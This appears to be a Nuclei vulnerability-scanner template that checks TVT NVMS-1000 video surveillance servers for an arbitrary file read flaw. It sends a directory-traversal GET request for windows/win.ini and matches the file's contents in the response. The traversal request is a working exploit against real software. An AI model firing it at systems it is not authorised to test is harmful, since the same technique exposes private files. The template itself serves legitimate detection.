id: NVMS-1000-fileread

info:
  name: NVMS-1000网络监控视频管理系统存在任意文件读取
  author: onewin
  severity: high
  description: NVMS-1000网络监控视频管理系统存在任意文件读取
  metadata:
    max-request: 1
    vendor: tvt
    product: nvms-1000_firmware
  tags: TVT-NVMS-1000

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../windows/win.ini"
    headers:
      Accept: "*/*"
      X-Requested-With: XMLHttpRequest
      Accept-Encoding: "gzip, deflate"
      Accept-Language: "zh-CN,zh;q=0.9"
      Cookie: "dataPort=6063"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200
